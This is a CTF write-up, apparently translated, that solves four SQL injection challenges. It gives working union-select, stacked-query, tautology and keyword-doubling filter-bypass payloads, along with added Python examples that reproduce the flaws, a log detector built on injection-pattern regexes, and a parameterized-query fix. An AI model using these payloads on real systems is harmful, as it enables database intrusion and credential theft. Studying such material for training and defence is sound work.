[Geek Challenge 2019] EasySQL
Enter a username and password: admin and admin.
Try to inject:
/check.php?username=admin&password=admin'
An error message appears, so use the universal-password payload:
/check.php?username=admin&password=admin' or 1=1%23
or, based on the error message:
/check.php?username=admin&password=admin' or' 1=1
The flag is returned. The flag for this challenge is:
flag{819d0c4e-cce7-4f46-9aad-fa85460da70d}
[SUCTF 2019]EasySQL
Target machine interface:
Entering 1 or another non-zero number is echoed normally, but entering 0 or letters is not.
Capture the request: this challenge uses a POST request, so the input is in the request body.
Test in the repeater and check the echoed information; this can be repeated as many times as needed.
Appending ', ", ') or ") to the input does not produce an error: either nothing is echoed, or "Nonono" appears. A non-zero number is echoed normally, while 0 and letters return nothing.
This suggests that some SQL keywords are filtered.
A trailing semicolon still queries normally:
query=1;
So stacked queries (stacked injection) are likely possible.
Show the databases:
query=1;show databases;
List the tables:
query=1;show tables;
A table named Flag is found, which probably holds what we want; try to read it:
query=1;show columns from Flag;
show columns from <table> lists the column names of a table.
"Nonono" appears, so the backend probably filters the word Flag.
Recall that a non-zero number is echoed while 0 and letters are not. This suggests the SQL statement contains a || operator: only when a non-zero number is input does the expression evaluate to true, and only then is the result echoed.
The statement is therefore guessed to be: select input||flag from Flag
Construct the payload: *,1
query=*,1
|| short-circuits: when the left operand is true, the right operand is not evaluated, the expression returns true, and the result is echoed.
The query becomes the equivalent of select *, 1 from Flag
select * means the same as listing every column explicitly; the difference is negligible, so when all (or most) fields are wanted, select * can be used.
Solution two:
payload:
query=1;set sql_mode=PIPES_AS_CONCAT;select 1
Here set sql_mode=PIPES_AS_CONCAT changes the meaning of || from logical OR to string concatenation, so || acts as a concatenation operator.
The echo succeeds and the flag is shown.
In summary, the flag for this challenge is:
flag{c10b7151-b3b6-412b-8b0b-020f2600fcb0}
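As an added illustration (not code from the original write-up), the following Python script reproduces the reasoning behind both solutions against an in-memory SQLite stand-in. SQLite's || is always string concatenation, so it behaves like MySQL with sql_mode=PIPES_AS_CONCAT (solution two) and also shows why the *,1 payload (solution one) returns the flag column. MySQL's default behaviour, where || is a logical OR over numerically coerced operands, does not exist in SQLite, so it is modelled in mysql_default_or() from MySQL's documented coercion rules rather than run against MySQL. The table name Flag and column flag follow the write-up; the flag value is constructed sample data.

```python
import re
import sqlite3

# Constructed sample row; the real challenge flag is not used here.
FLAG_VALUE = "flag{constructed-sample-flag}"


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the challenge database: one table Flag(flag)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Flag (flag TEXT)")
    con.execute("INSERT INTO Flag VALUES (?)", (FLAG_VALUE,))
    return con


def challenge_query(user_input: str) -> list:
    """Run the (assumed) vulnerable statement `select <input>||flag from Flag`
    with the input spliced straight into the select list.

    In SQLite `||` is concatenation, so this is the PIPES_AS_CONCAT case of
    solution two. It also shows solution one: with the input `*,1` the
    statement becomes `select *,1||flag from Flag`, and the `*` returns the
    flag column regardless of how `||` is interpreted.
    """
    con = make_db()
    return con.execute(f"SELECT {user_input}||flag FROM Flag").fetchall()


def to_number(value) -> float:
    """Model MySQL's lenient string-to-number coercion: the leading numeric
    prefix is used ('12ab' -> 12) and a string with no such prefix is 0."""
    if isinstance(value, (int, float)):
        return float(value)
    m = re.match(r"\s*[-+]?(\d+(\.\d*)?|\.\d+)", str(value))
    return float(m.group(0)) if m else 0.0


def mysql_default_or(lhs, rhs) -> int:
    """Model of `lhs || rhs` under MySQL's default sql_mode, where || is a
    logical OR that coerces both operands to numbers and returns 0 or 1.
    This models the documented rule; it is not a call into MySQL."""
    return 1 if to_number(lhs) != 0 or to_number(rhs) != 0 else 0


def default_mode_echo(user_input: str) -> int:
    """What `select <input>||flag from Flag` yields per row in default mode:
    non-zero numbers give 1 (echoed), 0 and letters give 0 (no echo), because
    the flag string itself coerces to 0 and cannot make the OR true."""
    return mysql_default_or(user_input, FLAG_VALUE)


if __name__ == "__main__":
    print("default mode, input 1   :", default_mode_echo("1"))
    print("default mode, input 0   :", default_mode_echo("0"))
    print("default mode, input abc :", default_mode_echo("abc"))
    print("PIPES_AS_CONCAT, input 1:", challenge_query("1"))
    print("select *,1 from Flag    :", challenge_query("*,1"))
```

The root cause is that user input lands in the select list of the statement. Bound parameters can carry values but not column expressions, so the fix on the server side is to stop splicing the input into the query at all: accept only an allow-listed column name or a plain integer, and build the statement from that.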
[Geek Challenge 2019] LoveSQL
From the target machine's interface, the login form suggests SQL injection, and the challenge title confirms it.
Viewing the page source reveals check.php. Guessing that it is the login handler, enter an account and password and observe the redirect and the prompt.
Back on the target interface, try logging in with admin and admin.
Tool: hackbar
It reports that the username or password is wrong. Next, inject and see whether an error is returned:
/check.php?username=admin&password=admin'
An error message appears, so error-based injection with the updatexml() function could be used.
However, updatexml() limits the output to 32 characters; anything beyond 32 characters will not be shown.
Instead we inject normally with a union query.
First use the universal-password payload to see whether information can be extracted; a normal echo is displayed:
/check.php?username=admin&password=admin' or 1=1%23
or
/check.php?username=admin&password=admin' or' 1=1--+
The echo is normal. Log in with this information; the same interface is still shown, so continue injecting and determine the number of columns:
/check.php?username=admin&password=d19fdabb42e569b878538b88d47f5c91' order by 4%23
An error message appears; replace 4 with 3:
/check.php?username=admin&password=d19fdabb42e569b878538b88d47f5c91' order by 3%23
Normal echo, so there are 3 columns.
Determine the echo points with a union query:
/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91' union select 1,2,3%23
Extract the database version and the current database:
/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91' union select 1,version(),database()%23
Extract the tables:
/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91' union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema=database()%23
The flag is probably in the second table, so extract that table's columns:
/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91' union select 1,version(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23
Sensitive column names are found in the response; continue extracting.
Dump the table's sensitive data, username and password:
/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91' union select 1,2,group_concat(username,password) from l0ve1ysq1%23
The echo succeeds and the flag is obtained:
Scroll to the far right to see the flag.
In summary, the flag for this challenge is flag{e45a955a-75e2-4f27-abb7-8f9ad51b020d}
The flag might also be stored in another database, so list all databases:
/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91' union select 1,version(),group_concat(schema_name) from information_schema.schemata%23
The remaining queries are essentially the same as those above; guess and query to obtain the flag information.
If it cannot be found, switch to another database or table.
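As an added, defender-side example that is not part of the write-up, the following Python script shows how the probes used in this section (a quote break, or 1=1, order by N, union select, information_schema lookups, and the %23 / --+ comment terminators) appear in a web server's access log, and how to flag them after URL-decoding the parameters. The log lines, IP addresses and timestamps are constructed for the example; the indicator list is a heuristic for these specific probe shapes, not a complete SQL injection detector.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Combined-format access-log lines, constructed for this example (the IPs,
# timestamps and request strings are not taken from the challenge).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /check.php?username=admin&password=admin HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /check.php?username=admin&password=admin%27 HTTP/1.1" 200 640
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /check.php?username=admin&password=admin%27%20or%201=1%23 HTTP/1.1" 200 700
203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /check.php?username=admin&password=x%27%20order%20by%204%23 HTTP/1.1" 200 640
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /check.php?username=admin&password=-x%27%20union%20select%201,version(),group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23 HTTP/1.1" 200 900
198.51.100.7 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?page=about HTTP/1.1" 200 300
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')


def _has(pattern: str):
    """Build a case-insensitive regex test over one decoded parameter value."""
    rx = re.compile(pattern, re.I)
    return lambda v: rx.search(v) is not None


# Indicators are checked against the URL-decoded value, which is what the
# server-side script sees ('%27' -> "'", '%23' -> '#', '--+' -> '-- ').
INDICATORS = {
    "unbalanced_quote": lambda v: v.count("'") % 2 == 1,
    "quote_then_boolean": _has(r"'\s*(or|and)\b"),
    "tautology": _has(r"\b(or|and)\s+['\"]?\w+['\"]?\s*=\s*['\"]?\w+"),
    "union_select": _has(r"\bunion\b[\s\S]*\bselect\b"),
    "order_by_probe": _has(r"\border\s+by\s+\d+"),
    "schema_enumeration": _has(r"\binformation_schema\."),
    "comment_terminator": _has(r"#|--(\s|$)"),
}


def analyze_line(line: str):
    """Parse one log line; return (client_ip, path, [indicator names]) or
    None when the line is not in the expected format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ip, _ts, _method, target, _status, _size = m.groups()
    url = urlsplit(target)
    hits = []
    # parse_qsl percent-decodes and maps '+' to a space, like the web server.
    for _name, value in parse_qsl(url.query, keep_blank_values=True):
        for label, test in INDICATORS.items():
            if label not in hits and test(value):
                hits.append(label)
    return ip, url.path, hits


def suspicious_requests(log_text: str) -> list:
    """Return (ip, path, indicators) for every line with at least one hit."""
    found = []
    for line in log_text.splitlines():
        parsed = analyze_line(line)
        if parsed is not None and parsed[2]:
            found.append(parsed)
    return found


if __name__ == "__main__":
    for ip, path, hits in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(hits)}")
```

Decoding before matching matters: the raw log line carries %27 and %23, and a rule written against the encoded form misses a client that encodes differently. The escalating sequence from a single client (quote, tautology, column count, union, schema enumeration) is the pattern worth alerting on, more so than any single line.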
BUUCTF [Geek Challenge 2019] BabySQL
From the title and the interface, this is a SQL injection challenge.
View the page source.
check.php is found; clicking it reveals:
From the above, check.php is the login handler the form submits to; after entering a user and password, the login redirects.
Log in with admin and admin:
The username or password is wrong.
Start testing for injection.
Open hackbar to get the current URL.
Test the quoting context by appending ' to trigger an error.
Use the universal-password payload:
From the error message we guess that or is filtered; append a letter after or (ors) to verify:
The test confirms that or is stripped.
Try a double-writing bypass:
The echo succeeds and the username and password are revealed; substitute them into the request.
After executing, the same interface is still shown.
Next, determine the number of columns:
order contains or, so double-write it.
Testing also shows that by is filtered, so double-write that too:
/check.php?username=admin&password=9356e00537952a46e7bcf73abf6f2323' oorrder bbyy 4--+
An error is reported; replace 4 with 3 and try again:
/check.php?username=admin&password=9356e00537952a46e7bcf73abf6f2323' oorrder bbyy 3--+
Normal echo, so there are 3 columns.
Determine the echo points:
An error is reported again. From the error message we guess there is still filtering; append an arbitrary letter after union and after select to test:
This shows union and select are also filtered, so double-write them as well:
/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323' ununionion seselectlect 1,2,3--+
Echo points:
Extract the current database and its version:
/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323' ununionion seselectlect 1,version(),database()--+
Extract the tables in the database:
/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323' ununionion seselectlect 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
From the result it is clear that filtering still applies: from and where are also stripped, so double-write them in the same way:
/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()--+
Normal echo.
By observation and guessing, extract the column information of b4bsql:
/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'--+
Sensitive column names are obtained; dump the data directly:
/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323' ununionion seselectlect 1,2,group_concat(username,passwoorrd) frfromom b4bsql--+
The echo succeeds; scrolling to the very end reveals the flag:
Flag string:
In summary, the flag for this challenge is:
flag{8e9c11c7-b6c7-4ac7-99ab-5556af55ef3b}
There may also be flags in other tables, so list all databases:
/check.php?username=admin&password=-2ce9b0fc0e30d1df0ac3fec1557c3da9' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata--+
A ctf database is found; guessing that the flag information is in ctf, list the tables in the ctf database:
/check.php?username=admin&password=-2ce9b0fc0e30d1df0ac3fec1557c3da9' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'--+
A Flag table is found; continue extracting its columns:
/check.php?username=admin&password=-2ce9b0fc0e30d1df0ac3fec1557c3da9' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag'--+
Get the flag:
/check.php?username=admin&password=-2ce9b0fc0e30d1df0ac3fec1557c3da9' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag--+
The echo succeeds and the flag is obtained:
The flag is:
flag{8fc708e5-7f33-4696-88ea-70b6f30c68ce}
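As an added example, not code from the write-up, the following Python script reproduces the kind of filter the BabySQL steps above infer: a single-pass keyword blacklist in front of a string-built query. It uses an in-memory SQLite table with constructed accounts in place of the challenge's, and the blacklist itself is an assumption (the challenge's real filter is not shown). It shows why double-written keywords such as oorr and seselectlect come out of the filter intact, and places a parameterized query beside the vulnerable one: the parameterized version treats the whole input as a literal value, so neither the quote nor the keywords have any effect.

```python
import sqlite3

# Constructed sample accounts; none of these values come from the challenge.
USERS = [("admin", "constructed-password-1"), ("alice", "constructed-password-2")]

# Keywords the write-up found to be stripped (assumed filter list).
BLACKLIST = ["union", "select", "from", "where", "or", "by"]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the challenge's user table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    return con


def naive_filter(value: str) -> str:
    """Assumed filter: each blacklisted keyword is removed in a single pass
    (case-sensitive here for simplicity). Because str.replace is not applied
    again to its own output, 'oorr' becomes 'or' and 'seselectlect' becomes
    'select', which is exactly why double-writing survives."""
    for word in BLACKLIST:
        value = value.replace(word, "")
    return value


def vulnerable_login(con, username: str, password: str) -> list:
    """Filtered input spliced into the SQL string: the original bug."""
    sql = ("SELECT id, username, password FROM users "
           f"WHERE username='{naive_filter(username)}' "
           f"AND password='{naive_filter(password)}'")
    return con.execute(sql).fetchall()


def safe_login(con, username: str, password: str) -> list:
    """Parameterized query: the driver sends the values separately from the
    statement text, so quotes and keywords in them are just characters."""
    sql = "SELECT id, username, password FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    con = make_db()
    # A SQL comment ends the statement with '-- '; in the URL payloads above
    # this is sent as --+ (the + decodes to a space).
    probe = "x' oorr 1=1-- "
    print(naive_filter("oorrder bbyy 3"))          # order by 3
    print(vulnerable_login(con, "admin", probe))   # every row in the table
    print(safe_login(con, "admin", probe))         # []
```

A keyword blacklist is not a fix for string-built SQL: it can only ever describe the payloads its author thought of, and the write-up shows how little it takes to get past one. Prepared statements remove the problem at the source, because the database never parses user input as part of the statement.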
If there is anything wrong in this article, criticism and corrections are welcome!